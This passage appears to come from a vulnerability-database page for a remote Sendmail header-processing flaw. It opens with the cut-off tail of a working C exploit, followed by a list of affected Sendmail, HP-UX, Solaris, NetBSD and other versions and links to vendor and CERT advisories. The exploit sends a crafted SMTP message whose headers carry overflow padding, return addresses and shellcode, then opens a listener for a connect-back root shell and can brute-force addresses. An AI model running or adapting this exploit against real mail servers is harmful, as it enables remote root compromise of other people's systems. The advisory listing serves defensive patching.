szBuffer[1024]; if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("Error creating listening socket\n"); return; } my_addr.sin_family = AF_INET; my_addr.sin_port = htons(LISTENPORT); my_addr.sin_addr.s_addr = INADDR_ANY; memset(&(my_addr.sin_zero), 0, 8); if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) { printf("Error binding listening socket\n"); return; } if (listen(sockfd, 1) == -1) { printf("Error listening on listening socket\n"); return; } sin_size = sizeof(struct sockaddr_in); if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) { printf("Error accepting on listening socket\n"); return; } writesocket(tmpsock,"uname -a\n"); while(1) { fd_set readfs; FD_ZERO(&readfs); FD_SET(0,&readfs); FD_SET(tmpsock,&readfs); if(select(tmpsock+1,&readfs,NULL,NULL,NULL)) { int cnt; char buf[1024]; if (FD_ISSET(0,&readfs)) { if ((cnt=read(0,buf,1024)) < 1) { if(errno==EWOULDBLOCK || errno==EAGAIN) continue; else { printf("Connection closed\n"); return; } } write(tmpsock,buf,cnt); } if (FD_ISSET(tmpsock,&readfs)) { if ((cnt=read(tmpsock,buf,1024)) < 1) { if(errno==EWOULDBLOCK || errno==EAGAIN) continue; else { printf("Connection closed\n"); return; } } write(1,buf,cnt); } } } close(tmpsock); close(sockfd); return; } int main(int argc, char **argv) { struct sockaddr_in server; unsigned long ipaddr,i,bf=0; int sock,target; char tmp[BUFSIZE],buf[BUFSIZE],*p; if (argc <= 3) { printf("%s <target ip> <myip> <target number> [bruteforce start addr]\n",argv[0]); printtargets(); return 0; } target=atol(argv[3]); if (target < 0 || target >= maxarch) { printtargets(); return 0; } if (argc > 4) sscanf(argv[4],"%x",&bf); header(); fixshellcode(argv[2],LISTENPORT); if (bf && !fork()) { getrootprompt(); return 0; } bfstart: if (bf) { printf("Trying address 0x%x\n",bf); fflush(stdout); } if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("Unable to create socket\n"); exit(0); } server.sin_family = AF_INET; server.sin_port = htons(25); if (!bf) { printf("Resolving address... "); fflush(stdout); } if ((ipaddr = inet_addr(argv[1])) == -1) { struct hostent *hostm; if ((hostm=gethostbyname(argv[1])) == NULL) { printf("Unable to resolve address\n"); exit(0); } memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length); } else server.sin_addr.s_addr = ipaddr; memset(&(server.sin_zero), 0, 8); if (!bf) { printf("Address found\n"); printf("Connecting... "); fflush(stdout); } if (connect(sock,(struct sockaddr *)&server, sizeof(server)) != 0) { printf("Unable to connect\n"); exit(0); } if (!bf) { printf("Connected!\n"); printf("Sending exploit... "); fflush(stdout); } readsocket(sock,220); writesocket(sock,"HELO yahoo.com\r\n"); readsocket(sock,250); writesocket(sock,"MAIL FROM: [email protected]\r\n"); readsocket(sock,250); writesocket(sock,"RCPT TO: MAILER-DAEMON\r\n"); readsocket(sock,250); writesocket(sock,"DATA\r\n"); readsocket(sock,354); memset(buf,0,sizeof(buf)); p=buf; for (i=0;i<archs[target].angle;i++) { *p++='<'; *p++='>'; } *p++='('; for (i=0;i<archs[target].nops;i++) *p++=0xf8; *p++=')'; *p++=((char*)&archs[target].aptr)[0]; *p++=((char*)&archs[target].aptr)[1]; *p++=((char*)&archs[target].aptr)[2]; *p++=((char*)&archs[target].aptr)[3]; *p++=0; sprintf(tmp,"Full-name: %s\r\n",buf); writesocket(sock,tmp); sprintf(tmp,"From: %s\r\n",buf); writesocket(sock,tmp); p=buf; archs[target].aptr+=4; *p++=((char*)&archs[target].aptr)[0]; *p++=((char*)&archs[target].aptr)[1]; *p++=((char*)&archs[target].aptr)[2]; *p++=((char*)&archs[target].aptr)[3]; for (i=0;i<0x14;i++) *p++=0xf8; archs[target].aptr+=0x18; *p++=((char*)&archs[target].aptr)[0]; *p++=((char*)&archs[target].aptr)[1]; *p++=((char*)&archs[target].aptr)[2]; *p++=((char*)&archs[target].aptr)[3]; for (i=0;i<0x4c;i++) *p++=0x01; archs[target].aptr+=0x4c+4; *p++=((char*)&archs[target].aptr)[0]; *p++=((char*)&archs[target].aptr)[1]; *p++=((char*)&archs[target].aptr)[2]; *p++=((char*)&archs[target].aptr)[3]; for (i=0;i<0x8;i++) *p++=0xf8; archs[target].aptr+=0x08+4; *p++=((char*)&archs[target].aptr)[0]; *p++=((char*)&archs[target].aptr)[1]; *p++=((char*)&archs[target].aptr)[2]; *p++=((char*)&archs[target].aptr)[3]; for (i=0;i<0x20;i++) *p++=0xf8; for (i=0;i<strlen(code);i++) *p++=code[i]; *p++=0; sprintf(tmp,"Subject: AAAAAAAAAAA%s\r\n",buf); writesocket(sock,tmp); writesocket(sock,".\r\n"); if (!bf) { printf("Exploit sent!\n"); printf("Waiting for root prompt...\n"); if (readutil(sock,451)) printf("Failed!\n"); else getrootprompt(); } else { readutil(sock,451); close(sock); bf+=4; goto bfstart; } }

Products Mentioned

Configuraton 0

Sendmail>>Sendmail >> Version To (excluding) 8.9.3

Sendmail>>Sendmail >> Version From (including) 8.10.0 To (excluding) 8.11.6

Sendmail>>Sendmail >> Version From (including) 8.12.0 To (excluding) 8.12.8

Configuraton 0

Hp>>Alphaserver_sc >> Version *

Gentoo>>Linux >> Version 1.4

Gentoo>>Linux >> Version 1.4

Hp>>Hp-ux >> Version 10.10

Hp>>Hp-ux >> Version 10.20

Hp>>Hp-ux >> Version 11.00

Hp>>Hp-ux >> Version 11.0.4

Hp>>Hp-ux >> Version 11.11

Hp>>Hp-ux >> Version 11.22

Netbsd>>Netbsd >> Version 1.5

Netbsd>>Netbsd >> Version 1.5.1

Netbsd>>Netbsd >> Version 1.5.2

Netbsd>>Netbsd >> Version 1.5.3

Netbsd>>Netbsd >> Version 1.6

Oracle>>Solaris >> Version 2.6

Oracle>>Solaris >> Version 7.0

Oracle>>Solaris >> Version 8

Oracle>>Solaris >> Version 9

Sun>>Sunos >> Version -

Sun>>Sunos >> Version 5.7

Sun>>Sunos >> Version 5.8

Windriver>>Bsdos >> Version 4.2

Windriver>>Bsdos >> Version 4.3.1

Windriver>>Bsdos >> Version 5.0

Windriver>>Platform_sa >> Version 1.0

Références

http://www.redhat.com/support/errata/RHSA-2003-073.html
Tags : vendor-advisory, x_refsource_REDHAT
http://marc.info/?l=bugtraq&m=104678862109841&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.redhat.com/support/errata/RHSA-2003-227.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.securityfocus.com/bid/6991
Tags : vdb-entry, x_refsource_BID
http://www.kb.cert.org/vuls/id/398025
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.sendmail.org/8.12.8.html
Tags : x_refsource_CONFIRM
http://www.debian.org/security/2003/dsa-257
Tags : vendor-advisory, x_refsource_DEBIAN
http://marc.info/?l=bugtraq&m=104678739608479&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.redhat.com/support/errata/RHSA-2003-074.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.cert.org/advisories/CA-2003-07.html
Tags : third-party-advisory, x_refsource_CERT
http://marc.info/?l=bugtraq&m=104673778105192&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.6
Tags : vendor-advisory, x_refsource_CALDERA
ftp://ftp.sco.com/pub/updates/UnixWare/CSSA-2003-SCO.5
Tags : vendor-advisory, x_refsource_CALDERA
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000571
Tags : vendor-advisory, x_refsource_CONECTIVA
http://marc.info/?l=bugtraq&m=104679411316818&w=2
Tags : vendor-advisory, x_refsource_HP
http://marc.info/?l=bugtraq&m=104678862409849&w=2
Tags : mailing-list, x_refsource_BUGTRAQ